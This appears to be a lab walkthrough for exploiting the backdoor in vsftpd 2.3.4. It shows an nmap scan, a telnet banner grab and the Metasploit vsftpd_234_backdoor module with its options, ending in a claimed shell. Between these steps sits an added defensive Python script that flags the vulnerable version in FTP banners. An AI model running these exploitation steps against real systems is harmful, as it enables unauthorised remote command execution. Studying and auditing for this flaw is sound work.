vsFTPd Vulnerability Exploitation

vsftpd (Very Secure FTP Daemon) is an FTP server for Unix-like systems, including Linux. It is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

Identify the vulnerable host and scan it using nmap or any other favourite scanning tool.

nmap -p0-65535 192.168.2.129


The interesting port on this machine is 21. If we enumerate the FTP service by connecting to port 21 with telnet, we might get some information.

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

This machine has vsFTPd installed, and vsftpd version 2.3.4 is vulnerable: it contains a backdoor that allows command execution.
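The same banner check can be run by a defender over FTP greetings already collected from their own hosts. The Python below is an added example, not code from the original post: the host names and banners are constructed, and greeting_text() and audit() are hypothetical helper names. It parses the 220 greeting, including multi-line replies, and flags the version this page identifies as backdoored.

```python
import re

# Version the page identifies as backdoored.
FLAGGED_VERSIONS = {"2.3.4"}

# vsftpd's default greeting has the form "220 (vsFTPd 2.3.4)".
VSFTPD_RE = re.compile(r"\(vsFTPd\s+(\d+(?:\.\d+)*)\)", re.IGNORECASE)

# Constructed sample data: greetings as they might sit in an inventory scan log.
SAMPLE_BANNERS = {
    "ftp-a.example.internal": b"220 (vsFTPd 2.3.4)\r\n",
    "ftp-b.example.internal": b"220 (vsFTPd 3.0.3)\r\n",
    "ftp-c.example.internal": b"220-Welcome to the archive\r\n220 (vsFTPd 2.3.4)\r\n",
    "ftp-d.example.internal": b"220 ProFTPD Server ready.\r\n",
    "ssh-e.example.internal": b"SSH-2.0-OpenSSH_8.9\r\n",
}


def greeting_text(raw):
    """Return the text of an FTP 220 greeting, or "" if raw is not one.

    Multi-line replies (RFC 959) open with "220-" and close with a line
    that starts "220 "; lines in between may omit the code.
    """
    lines = [l for l in raw.decode("latin-1").splitlines() if l.strip()]
    if not lines or lines[0][:4] not in ("220 ", "220-"):
        return ""
    parts = []
    for line in lines:
        coded = line[:4] in ("220 ", "220-")
        parts.append(line[4:].strip() if coded else line.strip())
        if line.startswith("220 "):  # final line of the reply
            break
    return " ".join(p for p in parts if p)


def audit(banners):
    """Map each host to (vsftpd version or None, flagged?)."""
    report = {}
    for host, raw in banners.items():
        match = VSFTPD_RE.search(greeting_text(raw))
        version = match.group(1) if match else None
        report[host] = (version, version in FLAGGED_VERSIONS)
    return report


if __name__ == "__main__":
    for host, (version, flagged) in sorted(audit(SAMPLE_BANNERS).items()):
        status = "FLAG: verify package and replace" if flagged else "ok"
        print(f"{host:26} vsftpd={version or '-':8} {status}")
```

A banner match is a triage signal only: the greeting is configurable, so confirm the installed package before acting on either a hit or a miss.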

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

 Name   Current Setting  Required  Description
 ----   ---------------  --------  -----------
 RHOST                   yes       The target address
 RPORT  21               yes       The target port

Exploit target:

 Id  Name
 --  ----
 0   Automatic

Set RHOST and RPORT to exploit the target.


Got the shell 🙂
